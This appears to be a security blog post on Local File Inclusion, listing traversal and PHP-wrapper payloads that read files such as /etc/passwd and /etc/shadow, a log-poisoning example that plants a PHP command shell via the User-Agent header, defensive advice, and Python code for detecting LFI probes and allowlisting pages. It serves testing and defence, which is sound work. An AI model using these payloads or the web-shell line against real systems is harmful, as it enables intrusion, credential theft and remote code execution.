Parameters to find LFI


Use these parameter payloads to test for Local File Inclusion (LFI) vulnerabilities. I've also included some tips from my notes to sharpen your testing:

Common LFI Payloads

These payloads are useful for testing LFI vulnerabilities in web applications:

  1. file=/etc/passwd%3F/
  2. file=/etc%252Fpasswd/
  3. file=/etc%252Fpasswd%3F/
  4. file=../../../../../../../../../etc/passwd
  5. file=../../../../../../../../../etc/passwd%00
  6. file=../../../../../../../../../etc/passwd%2500
  7. file=../../../../../../../../../etc/passwd%00.jpg
  8. file=../../../../../../../../../proc/self/environ
  9. file=../../../../../../../../../proc/self/fd/2
  10. file=../../../../../../../../../var/log/apache2/access.log
  11. file=php://filter/read=convert.base64-encode/resource=index.php


Tips for LFI Exploitation

  1. Null Byte Injection: Some applications may be vulnerable to null byte injection, which truncates the path before a file extension the server appends. For example, use %00, or %2500 when the value is decoded twice.

  2. Encoding Variants: Try different encoding techniques like double encoding (%252e%252e%252f, which decodes to ../ after two rounds).

  3. Traversal Beyond Root: Attempt traversing beyond the web root directory using multiple levels of ../.

  4. Log Poisoning: If you have access to a file upload functionality or any input that gets logged (e.g., user agent), you can try log poisoning to include your payload in log files.

  5. PHP Wrappers: Use PHP stream wrappers like php://filter, php://input, or expect:// (only when the expect extension is installed) to read or execute files.

  6. Common Files to Target:

    • /etc/passwd
    • /etc/shadow
    • /proc/self/environ
    • Web server logs (e.g., /var/log/apache2/access.log)
    • Configuration files (e.g., /etc/httpd/conf/httpd.conf)

  7. Web Application Files: Target files within the web application that might contain sensitive information, such as config.php, index.php, or .htaccess.
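The encoding variants in tips 1 and 2 are exactly what a defender's detector has to undo before matching: the raw string %252e%252e%252f never matches ../ until it has been percent-decoded twice. The following Python is an added example, not code from this post, that parses constructed Common Log Format lines, decodes each query parameter until it is stable, and flags the traversal, null-byte, wrapper and sensitive-path indicators listed above. The sample log lines, the parameter name page and the indicator names are constructed for the example.

```python
"""Detect LFI probing in web server access logs (added example, not from the post).

The payloads above rely on traversal sequences, null bytes, double URL-encoding
and PHP stream wrappers. A detector must strip the encoding layers first,
otherwise "%252e%252e%252f" never matches "../".
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Common Log Format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1024
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=%252e%252e%252f%252e%252e%252fetc/passwd HTTP/1.1" 200 1024
203.0.113.9 - - [10/Oct/2023:13:55:45 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4096
203.0.113.9 - - [10/Oct/2023:13:55:50 +0000] "GET /images/logo.png HTTP/1.1" 200 2048
"""

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators are matched against the fully decoded value, in this order.
INDICATORS = [
    ("traversal", re.compile(r"(\.\./|\.\.\\)")),
    ("null_byte", re.compile("\x00")),
    ("php_wrapper", re.compile(r"^(php|expect|data|phar)://", re.I)),
    ("sensitive_path", re.compile(r"(/etc/(passwd|shadow)|/proc/self/|/var/log/)", re.I)),
]


def normalize(value, max_rounds=3):
    """Percent-decode repeatedly until the value stops changing.

    Handles %2e, %252e, %25252e ... A bounded number of rounds keeps a
    pathological input from looping forever.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def indicators_for(value):
    """Return the names of every indicator present in the decoded value."""
    normalized = normalize(value)
    return [name for name, rx in INDICATORS if rx.search(normalized)]


def scan_request_target(target):
    """Check the URL path and every query parameter of one request target.

    Returns {parameter_name: [indicator names]} for suspicious values only;
    the path itself is reported under the key "<path>".
    """
    parts = urlsplit(target)
    # parse_qsl already decodes one layer; normalize() handles the rest.
    candidates = [("<path>", parts.path)] + parse_qsl(parts.query, keep_blank_values=True)
    findings = {}
    for name, value in candidates:
        hits = indicators_for(value)
        if hits:
            findings[name] = hits
    return findings


def scan_log(text):
    """Return one (client_ip, parameter, indicators) tuple per suspicious value."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        for param, hits in scan_request_target(m["target"]).items():
            findings.append((m["ip"], param, hits))
    return findings


if __name__ == "__main__":
    for ip, param, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} param={param} indicators={','.join(hits)}")
```

Running the block on the constructed log reports the three probing requests and ignores the two benign ones. The bounded decode loop is the important design point: a detector that decodes only once sees the double-encoded request as harmless, and one that decodes without a bound can be made to spend unbounded time on nested encodings.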

Example of a Log Poisoning Attack

If you can inject data into a log file, you can then include that log file via the LFI vulnerability to execute code. Here's a simple example:

  1. Inject PHP code into the user agent header:

User-Agent: <?php system($_GET['cmd']); ?>

  2. Include the access log file to execute the code:

http://example.com/vulnerable.php?file=../../../../var/log/apache2/access.log&cmd=whoami

Defense Mechanisms

To prevent LFI vulnerabilities:

  1. Input Validation: Strictly validate and sanitize all user inputs.
  2. Use Whitelists: Use a whitelist of allowed file paths.
  3. Disable Dangerous Functions: Disable PHP functions like include, require, include_once, and require_once if not needed.
  4. Web Application Firewalls (WAFs): Employ a WAF to detect and block LFI attempts.
  5. Least Privilege: Ensure the web server runs with the least privileges necessary.
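Items 1 and 2 above (validation and a whitelist of allowed files) are the controls that actually remove the bug, and the usual way to get them wrong is to validate the string while the filesystem still resolves it. The Python below is an added example, not code from this post and not PHP, illustrating the logic in a language-neutral way: the user-supplied value is a key into an allowlist, never a path fragment, and even the looked-up file is checked for containment after the real path is resolved. A fallback for applications that cannot enumerate every page is included as well. The page names, the ALLOWED_PAGES table and the temporary directory are assumptions made for the example.

```python
"""Allowlisted page loading with real-path containment (added example, not from the post)."""
import tempfile
from pathlib import Path

# Constructed allowlist: user input selects a key, the server supplies the filename.
ALLOWED_PAGES = {
    "home": "home.html",
    "about": "about.html",
    "contact": "contact.html",
}


class UnsafePageError(ValueError):
    """Raised for any page request that must not be served."""


def _contained(root, candidate):
    """True only if candidate is strictly below root after symlinks and '..' are resolved."""
    return root in candidate.parents


def resolve_page(pages_root, page_name):
    """Map a user-supplied page name to a file under pages_root.

    1. Allowlist lookup: an unknown key is rejected outright.
    2. Containment check: defence in depth in case the allowlist entry or a
       symlink under pages_root ever points outside the directory.
    """
    root = Path(pages_root).resolve()
    filename = ALLOWED_PAGES.get(page_name)
    if filename is None:
        raise UnsafePageError(f"unknown page: {page_name!r}")
    candidate = (root / filename).resolve()
    if not _contained(root, candidate):
        raise UnsafePageError("allowlisted entry resolves outside the pages directory")
    return candidate


def resolve_under_root(pages_root, user_path):
    """Weaker fallback when an allowlist is not practical.

    Rejects null bytes (extension truncation), stream-wrapper schemes and
    absolute paths before touching the filesystem, then enforces containment
    on the resolved path and pins the extension.
    """
    if "\x00" in user_path or "://" in user_path or user_path.startswith(("/", "\\")):
        raise UnsafePageError(f"rejected path: {user_path!r}")
    root = Path(pages_root).resolve()
    candidate = (root / user_path).resolve()
    if not _contained(root, candidate):
        raise UnsafePageError("path escapes the pages directory")
    if candidate.suffix != ".html":
        raise UnsafePageError("only .html pages may be served")
    return candidate


def build_demo_root():
    """Create a throwaway pages directory (constructed for the example) and return its path."""
    root = Path(tempfile.mkdtemp(prefix="pages-"))
    for filename in ALLOWED_PAGES.values():
        (root / filename).write_text(f"<h1>{filename}</h1>\n")
    return str(root)


if __name__ == "__main__":
    root = build_demo_root()
    print("home ->", resolve_page(root, "home"))
    for bad in ["../../../../etc/passwd", "about.html\x00.jpg", "php://filter/resource=index.php"]:
        try:
            resolve_under_root(root, bad)
        except UnsafePageError as exc:
            print("rejected:", exc)
```

The allowlist function is the one to prefer: there is no path to sanitize because the request never contains one. The fallback exists for legacy code, and its containment check must run on the resolved path, since a check on the raw string is what the encoding and null-byte variants in this post are designed to slip past.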


Comments
shadowisnear 20 w

Good job mate!